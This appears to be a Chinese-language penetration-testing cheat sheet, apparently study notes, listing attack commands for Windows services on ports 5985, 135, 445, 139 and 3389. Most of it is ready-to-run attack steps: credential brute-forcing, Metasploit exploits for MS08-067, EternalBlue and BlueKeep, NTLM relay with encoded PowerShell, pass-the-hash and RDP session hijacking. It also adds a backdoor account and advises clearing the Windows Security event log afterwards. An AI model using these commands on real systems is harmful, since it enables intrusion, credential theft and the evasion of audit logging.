端口渗透测试详细指南
1. 端口5985(WinRM HTTP)
协议/服务
- Windows Remote Management (WinRM):基于HTTP/HTTPS的远程管理协议,默认使用5985(HTTP)/5986(HTTPS)。
- 依赖条件:需启用WinRM服务,通常需要有效凭证或弱口令。
常见漏洞与利用方法
1.1 凭证爆破
- 工具:
crackmapexec、hydra、Metasploit - 操作步骤:
# 使用crackmapexec爆破WinRM crackmapexec winrm <目标IP> -u users.txt -p passwords.txt# 使用hydra爆破(需指定模块) hydra -L users.txt -P passwords.txt <目标IP> winrm -V
1.2 Evil-WinRM连接
- 工具:Evil-WinRM
- 操作步骤:
# 基本连接 evil-winrm -i <目标IP> -u <用户名> -p <密码># PtH(需管理员权限) evil-winrm -i <目标IP> -u <用户名> -H <NTLM哈希># 上传/下载文件 upload /本地/文件路径 download C:\\目标文件路径
1.3 NTLM Relay攻击
- 条件:目标未启用SMB签名,需配合Responder或Impacket。
- 操作步骤:
# 启动ntlmrelayx.py中继到WinRM ntlmrelayx.py -t <目标IP> -smb2support --no-wcf-server --no-http-server -c "powershell -enc <Base64命令>"
1.4 SeImpersonate / SeAssignPrimaryToken 提权
- 参见:[Windows提权](../Tryhackme/提权/Windows提权.md#SeImpersonate / SeAssignPrimaryToken)
1.5 横向移动
- 参见:[AD横向](../Tryhackme/红队/AD横向移动.md#使用 WinRM 进行远程 PowerShell 会话)
仅开放5985时的打法
- 信息收集:
nmap -p 5985 <目标IP> --script winrm-* # 检测WinRM配置 - 爆破凭证:
crackmapexec winrm <目标IP> -u "Administrator" -p "Password123" - 横向移动:
- 通过WinRM执行命令收集内网信息。
- 上传Mimikatz抓取内存凭证。
- 利用PsExec或WMI进一步渗透。
2. 端口135(RPC/DCOM)
协议/服务
- Microsoft RPC/DCOM:用于远程过程调用,常见于Windows系统。
- 依赖条件:需启用RPC服务,部分漏洞需旧版系统(如Windows XP/2003)。
常见漏洞与利用方法
2.1 MS08-067(CVE-2008-4250)
- 影响系统:Windows 2000/XP/2003。
- 利用工具:Metasploit
msf6 > use exploit/windows/smb/ms08_067_netapi msf6 > set RHOST <目标IP> msf6 > set PAYLOAD windows/meterpreter/reverse_tcp msf6 > exploit
2.2 DCOM横向移动
-
工具:Impacket的
dcomexec.py -
操作步骤:
# 通过DCOM执行命令(需凭证) dcomexec.py 域名/用户:密码@目标IP "whoami"# 使用哈希传递 dcomexec.py -hashes LM哈希:NT哈希 用户@目标IP "命令" -
配合WMI横向:
参见:AD横向
2.3 NTLM哈希窃取
- 利用RPC获取NTLM哈希:
# 使用rpcclient枚举信息 rpcclient -U "" <目标IP> # 空会话尝试 rpcclient> enumdomusers # 枚举域用户
仅开放135时的打法
- 漏洞利用(旧系统):
- 使用MS08-067获取Shell。
- 横向移动(需凭证):
python3 dcomexec.py admin:Password123@目标IP "net user backdoor P@ssw0rd /add" - 信息泄露:
- 通过空会话获取用户列表、共享信息。
3. 端口445(SMB)
协议/服务
- SMB(Server Message Block):文件共享、打印机服务。
- 关键漏洞:永恒之蓝(MS17-010)、SMBGhost(CVE-2020-0796)。
常见漏洞与利用方法
3.1 永恒之蓝(MS17-010)
- 影响系统:Windows 7/2008及更早版本。
- 利用步骤:
msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOST <目标IP> msf6 > exploit
3.2 SMBGhost(CVE-2020-0796)
- 影响系统:Windows 10 1903-1909。
- 利用工具:https://github.com/chompie1337/SMBGhost_RCE_PoC
python3 exploit.py -ip <目标IP> -port 445
3.3 SMB共享枚举与爆破
- 工具:
smbclient、crackmapexec# 枚举共享 smbclient -L //目标IP/ -U ""# 爆破凭证 crackmapexec smb <目标IP> -u users.txt -p passwords.txt
3.4 Pass-the-Hash攻击
-
参见:[PsExec远程执行](../Tryhackme/红队/AD横向移动.md#使用 PsExec 进行远程执行)
-
工具:Impacket的
psexec.pypsexec.py -hashes 00000000000000000000000000000000:ABCDEF1234567890ABCDEF1234567890 Administrator@目标IP
3.5 SMB中继攻击
-
关键依赖:
- SMB签名未启用:默认情况下,Windows系统仅对域控制器强制启用SMB签名,其他服务器/工作站可能未启用。
- 网络流量可劫持:需具备中间人能力(如ARP欺骗、DNS劫持或物理网络访问)。
-
通过arp欺骗实现中间人攻击,截获SMB认证请求(NTLMv1/v2哈希),并将其中继到其他目标系统,利用目标系统的信任关系执行命令或获取权限。
-
NTLM中继工具(如Impacket的
ntlmrelayx.py):ntlmrelayx.py -tf targets.txt -smb2support -c "powershell -enc <Base64命令>"参数说明:
-tf targets.txt:中继目标列表(文件内容为待攻击的IP列表)。-c:中继成功后执行的命令(如添加用户、启动反向Shell)。
仅开放445时的打法
- 漏洞利用:
- 永恒之蓝或SMBGhost直接获取权限。
- 共享访问:
smbclient \\\\目标IP\\C$ -U Administrator%Password123 # 访问C盘 - 哈希传递:
- 使用已获取的NTLM哈希横向移动。
4. 端口139(NetBIOS)
协议/服务
- NetBIOS Session Service:老旧协议,通常与SMBv1绑定。
- 利用场景:信息泄露、SMBv1漏洞(如永恒之蓝)。
常见利用方法
4.1 NetBIOS信息泄露
- 工具:
nbtscannbtscan -r <目标IP>/24 # 扫描NetBIOS名称
4.2 SMBv1漏洞利用
- 操作同445端口:若139端口支持SMBv1,可尝试永恒之蓝。
4.3 NetBIOS 名称欺骗
- 攻击者可以通过伪造 NetBIOS 名称来欺骗目标系统,使其与攻击者控制的系统建立连接。这样攻击者就可以获取目标系统的信息,或者进行进一步的攻击,如会话劫持等。
- 参见:AD渗透-认证中继
4.4 利用 NetBIOS 会话劫持漏洞
- 攻击原理
- 会话ID预测:NetBIOS会话使用可预测的ID(16位数字),攻击者可猜测有效会话ID并注入恶意指令。
- 数据注入:在已建立的会话中插入伪造的SMB命令(如文件操作、服务启动)。
仅开放139时的打法
- 检测SMB版本:
nmap --script smb-protocols -p 139 <目标IP> - 利用SMBv1漏洞:
- 若支持SMBv1,尝试永恒之蓝或爆破弱口令。
5. 端口3389(RDP)
协议/服务
- 远程桌面协议(RDP):Windows远程管理接口。
- 关键漏洞:BlueKeep(CVE-2019-0708)。
常见漏洞与利用方法
5.1 BlueKeep(CVE-2019-0708)
- 影响系统:Windows 7/2008 R2。
- 利用工具:Metasploit
msf6 > use exploit/windows/rdp/cve_2019_0708_bluekeep msf6 > set RHOST <目标IP> msf6 > exploit
5.2 RDP凭证爆破
- 工具:
hydra、Ncrackhydra -L users.txt -P passwords.txt rdp://<目标IP> -V
5.3 RDP会话劫持
接管未注销的rdp会话,详细内容参见:[rdp会话接管](../Tryhackme/红队/AD横向移动.md#RDP会话劫持(RDP Hijacking))
-
工具:
tscon(需已登录会话)# 在已登录的RDP会话中执行 tscon 1 /dest:rdp-tcp#0 # 劫持会话ID
5.4 xfreerdp实现pth
- 参见:AD横向
仅开放3389时的打法
-
漏洞利用:
- BlueCheck检测后利用Metasploit攻击。
-
爆破登录:
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://目标IP -
会话劫持
总结表格:端口利用速查
| 端口 | 优先级操作 | 常用工具 |
|---|---|---|
| 5985 | 爆破凭证 → Evil-WinRM → NTLM中继 | crackmapexec, evil-winrm, Impacket |
| 135 | MS08-067 → DCOM横向移动 → NTLM窃取 | Metasploit, dcomexec.py |
| 445 | 永恒之蓝 → 共享枚举 → Pass-the-Hash | Metasploit, smbclient, psexec.py |
| 139 | SMBv1漏洞 → NetBIOS信息枚举 | nbtscan, crackmapexec |
| 3389 | BlueKeep → RDP爆破 → 黄金票据 | hydra, Metasploit, mimikatz |
注意事项
- 授权测试:确保所有操作在合法授权范围内。
- 补丁检测:优先使用
nmap -sV --script vuln检测目标补丁状态。 - 日志清理:渗透完成后清理Windows事件日志(如
wevtutil cl security)。